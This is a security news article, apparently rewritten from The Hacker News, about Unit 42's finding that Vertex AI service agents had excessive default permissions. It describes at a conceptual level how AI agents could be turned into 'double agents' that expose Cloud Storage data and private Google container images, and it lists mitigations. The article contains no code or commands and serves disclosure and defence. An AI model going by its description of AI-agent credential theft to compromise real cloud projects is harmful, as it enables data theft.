Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts
ثغرة فـ Vertex AI: كيفاش "العملاء المزدوجين" يقدروا يكشفوا بيانات Google Cloud و الـ Artifacts الخاصة
Vertex AI Vulnerability: How "Double Agents" Can Expose Google Cloud Data and Private Artifacts
TL;DR
Researchers from Palo Alto Networks Unit 42 have uncovered a critical security "blind spot" in Google Cloud’s Vertex AI platform. Due to excessive default permissions in the platform's service agent model, attackers could weaponize AI agents to exfiltrate sensitive data, access restricted Google-owned repositories, and compromise cloud environments.
A new disclosure from cybersecurity researchers has highlighted a significant risk in the rapidly evolving world of AI deployment. According to a report by Palo Alto Networks Unit 42, a vulnerability in Google Cloud's Vertex AI platform could allow AI agents to be turned into "double agents," secretly compromising the very organizations they were designed to serve.
The issue stems from the Vertex AI permission model, specifically involving the Per-Project, Per-Product Service Agent (P4SA) used when deploying agents via the Vertex AI Agent Development Kit (ADK).
The Mechanics of the "Double Agent"
The vulnerability centers on excessive permission scoping granted by default to service agents. When an AI agent is deployed using the Vertex Agent Engine, any call to that agent invokes Google's metadata service.
Unit 42 researchers discovered that this process exposes the credentials of the service agent. These credentials contain highly sensitive information, including:
- The Google Cloud Platform (GCP) project hosting the agent.
- The identity of the AI agent.
- The OAuth scopes of the host machine.
By extracting these credentials, an attacker can jump from the AI agent's limited execution context directly into the customer’s broader GCP project.
Unrestricted Access to Cloud Data
The impact of this credential theft is severe. Researchers demonstrated that the stolen P4SA credentials effectively undermined isolation guarantees. In testing, they were able to gain unrestricted read access to all data stored within Google Cloud Storage buckets associated with that project.
"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into a potential insider threat," Unit 42 noted in their report.
Exposure of Google’s Internal Infrastructure
The reach of the vulnerability extended beyond customer data. Because the Agent Engine runs within a Google-managed tenant project, the extracted credentials also provided visibility into Google's own tenant buckets.
While the credentials lacked the specific permissions to read the data within those tenant buckets, they did grant access to restricted, Google-owned Artifact Registry repositories.
Researchers were able to:
- Download container images from private repositories that form the core of the Vertex AI Reasoning Engine.
- Access several other restricted images not explicitly listed in deployment logs.
- Gain a "blueprint" of Google's proprietary code and internal software supply chain.
By mapping these internal systems, an attacker could potentially identify deprecated or vulnerable images to plan more sophisticated secondary attacks.
Google's Response and Recommendations
In response to these findings, Google has updated its official documentation to clarify how Vertex AI utilizes resources, accounts, and agents.
To mitigate these risks, Google and Unit 42 recommend the following security measures:
- Use Bring Your Own Service Account (BYOSA): Replace default service agents with custom-configured accounts to avoid excessive default permissions.
- Enforce Least Privilege (PoLP): Ensure that AI agents are granted only the minimum permissions necessary to function.
- Restrict OAuth Scopes: Limit the reach of tokens used by the agent engine.
- Rigorous Validation: Treat AI agent deployments with the same security scrutiny as new production code, including source integrity reviews and controlled security testing.
"Granting agents broad permissions by default violates the principle of least privilege and is a dangerous security flaw by design," said Ofir Shaty, Unit 42 researcher.
Source
The Hacker News: Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts


